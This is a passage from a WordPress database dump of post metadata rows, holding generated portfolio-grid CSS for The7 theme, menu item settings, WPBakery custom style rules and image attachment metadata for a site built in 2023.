30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(50%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(1,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%)*2;\r\n  }\r\n}\r\n'),
(34512,4849,'_the7_imported_item','software-company'),
(34513,4849,'_dt_microsite_primary_menu','5'),
(34514,4849,'_dt_microsite_split_left_menu','5'),
(34515,4849,'_dt_microsite_split_right_menu','5'),
(34516,4849,'_dt_microsite_mobile_menu','5'),
(34517,4849,'_dt_page_overrides_right_margin',''),
(34518,4849,'_dt_page_overrides_left_margin',''),
(34519,4849,'_dt_mobile_page_padding_top',''),
(34520,4849,'_dt_mobile_page_padding_right',''),
(34521,4849,'_dt_mobile_page_padding_bottom',''),
(34522,4849,'_dt_mobile_page_padding_left',''),
(34523,4849,'_thumbnail_id','3299'),
(34572,4849,'_dp_original','3554'),
(34573,4849,'_edit_lock','1693981930:1'),
(34574,4849,'_edit_last','1'),
(34659,4852,'_menu_item_type','post_type'),
(34660,4852,'_menu_item_menu_item_parent','2351'),
(34661,4852,'_menu_item_object_id','4849'),
(34662,4852,'_menu_item_object','page'),
(34663,4852,'_menu_item_target',''),
(34664,4852,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(34665,4852,'_menu_item_xfn',''),
(34666,4852,'_menu_item_url',''),
(34668,2082,'_wp_old_date','2023-06-25'),
(34669,2083,'_wp_old_date','2023-06-24'),
(34670,2346,'_wp_old_date','2023-06-25'),
(34671,2348,'_wp_old_date','2023-06-24'),
(34672,2349,'_wp_old_date','2023-06-25'),
(34673,2350,'_wp_old_date','2023-06-25'),
(34674,2351,'_wp_old_date','2023-06-25'),
(34675,2904,'_wp_old_date','2023-06-24'),
(34676,3556,'_wp_old_date','2023-06-24'),
(34677,2084,'_wp_old_date','2023-06-25'),
(34678,2352,'_wp_old_date','2023-06-24'),
(34679,2281,'_wp_old_date','2023-06-25'),
(34680,2353,'_wp_old_date','2023-06-24'),
(34681,2354,'_wp_old_date','2023-06-24'),
(34682,2355,'_wp_old_date','2023-06-24'),
(34683,2282,'_wp_old_date','2023-06-24'),
(34684,2283,'_wp_old_date','2023-06-24'),
(34685,3671,'_wp_old_date','2023-06-24'),
(34686,3645,'_wp_old_date','2023-06-24'),
(34687,2284,'_wp_old_date','2023-06-25'),
(34688,2921,'_wp_old_date','2023-06-24'),
(34689,2285,'_wp_old_date','2023-06-25'),
(34690,2356,'_wp_old_date','2023-06-24'),
(34691,2357,'_wp_old_date','2023-06-24'),
(34692,2359,'_wp_old_date','2023-06-25'),
(34693,2358,'_wp_old_date','2023-06-24'),
(34694,2286,'_wp_old_date','2023-06-24'),
(34706,4877,'_wpb_shortcodes_custom_css','.vc_custom_1687856532478{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34707,4849,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34711,4880,'_wpb_shortcodes_custom_css','.vc_custom_1687856532478{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34712,4881,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34713,4882,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34714,4883,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858431751{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34715,4884,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858431751{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34719,4887,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34720,4888,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34721,4889,'_wp_attached_file','2023/06/amira_ibrahim_zaki.jpg'),
(34722,4889,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:102;s:6:\"height\";i:170;s:4:\"file\";s:30:\"2023/06/amira_ibrahim_zaki.jpg\";s:8:\"filesize\";i:4301;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"amira_ibrahim_zaki-102x150.jpg\";s:5:\"width\";i:102;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34725,4891,'_wp_attached_file','2023/06/radwa_ahmed_osman.jpg'),
(34726,4891,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:102;s:6:\"height\";i:134;s:4:\"file\";s:29:\"2023/06/radwa_ahmed_osman.jpg\";s:8:\"filesize\";i:3130;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34727,4892,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687859529575{margin-right: 10px !important;}.vc_custom_1687859538742{margin-right: 10px !important;}.vc_custom_1687859975681{margin-right: 10px !important;}'),
(34728,4893,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687859529575{margin-right: 10px !important;}.vc_custom_1687859538742{margin-right: 10px !important;}.vc_custom_1687859975681{margin-right: 10px !important;}'),
(34729,4894,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860438415{padding-right: 10px !important;}.vc_custom_1687860447378{padding-right: 10px !important;}.vc_custom_1687860457870{padding-right: 10px !important;}.vc_custom_1687860469553{padding-right: 5px !important;padding-left: 5px !important;}'),
(34730,4895,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}'),
